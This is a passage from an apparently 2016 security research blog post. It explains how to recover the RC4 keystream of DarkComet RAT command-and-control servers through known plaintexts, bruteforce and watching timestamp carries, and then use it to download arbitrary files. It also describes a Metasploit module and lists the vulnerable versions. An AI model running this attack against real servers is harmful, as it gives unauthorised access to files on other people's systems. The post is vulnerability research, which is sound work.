Here we have known plaintexts IDTYPE and GetSIN (both 6 bytes) and we can use the first plaintext to derive 6 bytes of keystream, apply them to SERVER, send that command and receive the GetSIN command. The absolute (hypothetical) minimum length of that third message would be of the form GetSIN1.1.1.1|120826718 (23 bytes) so if we can make assumptions about its contents we can derive enough keystream for our attack to work. The first argument of the message is an IP address, the IP address of the infected machine to be precise. A potential problem here is that it is the client IP address the C2 server obtains so there could be some issues with proxies and such here. However, assuming these are not in place we know this IP address and can thus extract an additional 8 to 16 (including the pipe sign) bytes of keystream which could potentially be enough to carry out the attack depending on the IP.

The second argument turns out to be a timestamp obtained via GetTickCount so either we try and (partially) predict the target system uptime (eg. finding an candidate remote uptime like Nmap does and then bruteforcing around that value) or we need to do some (clever) bruteforcing. Note that DC sends its keepalive commands to the infected machine in plaintext and includes the timestamp:

KeepAlive|8248090
KeepAlive|8248097
KeepAlive|8328105

But it only starts sending these keepalive commands after the infected machine has properly announced itself to the C2 server which requires sending an encrypted infoes command (see above) which requires more keystream bytes than we have. As such I decided to settle for an (augmented) bruteforcing approach.

Seeing as how we require either 20 or 21 bytes of keystream we first determine how many bytes of keystream we already have (with a minimum of 14) and determine how much we still need. If we have sufficient keystream we immediately execute the attack. If we are missing some keystream bytes (at most 7) we will bruteforce the first 4 of them (seeing as how the keyspace is merely 10**4 here which seems reasonable enough) by guessing the plaintext, deriving the keystream byte, trying the exploit and if it fails, moving on to the next candidate. If 4 extra bytes of keystream is still not enough we could fully bruteforce those as well (after all 10**7 < 2**32) but due to the nature of the plaintext we can apply a smarter trick here. Seeing as how the RC4 keystream is identical for every message and we can probe the server for an infinite amount of GetSIN messages we can observe the timestamp’s ciphertext across multiple messages. Since the misuse of RC4 effectively applies a single, static XOR key to the plaintext identical plaintexts (at identical positions) will map to identical ciphertexts across messages and sessions and as such we can watch the timestamp ‘tick on’ through the ciphertext, eg.:

Plain:  GetSIN192.168.93.130|120826718
Cipher: BA13A80DA73059312FAD9ACA0D76CB7723D6DAD0D438C45A1BE303C40E44
Plain:  GetSIN192.168.93.130|120826719
Cipher: BA13A80DA73059312FAD9ACA0D76CB7723D6DAD0D438C45A1BE303C40E45
Plain:  GetSIN192.168.93.130|120826720
Cipher: BA13A80DA73059312FAD9ACA0D76CB7723D6DAD0D438C45A1BE303C40D4C
Plain:  GetSIN192.168.93.130|120826721
Cipher: BA13A80DA73059312FAD9ACA0D76CB7723D6DAD0D438C45A1BE303C40D4D

As you can see in the example above, as the timestamp increments only the last byte changes until it reaches 9 after which it wraps back to 0 and via carry the byte left of it changes. Using this observational pattern we can deduce that if we see two bytes change between subsequent replies such a carry occurred and we can deduce the plaintext value for the byte that wrapped around from 9 to 0. As long as we target a part of the timestamp that changes frequently enough not to have to wait too long (otherwise bruteforce is a better option) nor too quickly (otherwise we get accuracy problems through our observational sampling being too infrequent, leading to false positives) this attack can recover remaining plaintext (at most 3 bytes since we recover the first 4 of the timestamp with bruteforce anyway) and hence keystream faster than by using bruteforce for this part.

Since we don’t want to miss the moment this ‘carry’ occurs nor do we want to sample too frequently I decided to store observations of the GetSIN response ciphertext in a circular buffer of size 4 so that this buffer can be traversed during every probe attempt and we can look whether a ‘carry’ has occurred by comparing ciphertexts in the buffer in successive order. In order to weed out false positives (which could occur when we miss multiple wraparounds between observations) I decided to put an additional constraint upon the ‘carry’ observation by requiring a candidate observation to differ in the crucial position with the previous observation but the one before that has to be identical to the previous observation.

In practice, however, most IP’s are long enough to already cover the required keystream (or an attacker can simply choose to attack from a host with a suitable IP) so a full bruteforce plus inference attack would rarely be required.

Metasploit Module

We can wrap all this together into an exploit that incrementally recovers more keystream until it has enough to cover the exploit string, thus allowing for exploitation without having to know the key, which is what I did in this MSF auxiliary module. The exploit can be configured to use a known key (so no cryptographic attack is required) and if a key is known it can also be configured to download any file the attacker wishes. If the attack is run without supplying a key it will automatically download the config.ini file and try to extract the password (note that if it can’t find a password the C2 server is probably running without password so try the key prefix as key). Any downloaded file is optionally stored to MSF loot. During the bruteforce attack the exploit decides whether or not the exploit succeeded by if it gets a response, in order to prevent the bruteforce from becoming too slow a dedicated bruteforce timeout value can be specified.

Running the exploit against a DarkComet C2 server looks as follows:

I tested the exploit against (and confirmed the vulnerability in) the following DarkComet C2 versions:

5.3.1
5.3.0
5.2
4.2 (F)
4.2
4.0
3.3
3.2

samvartaka 03 June 2016

Next Post → ← Earlier Post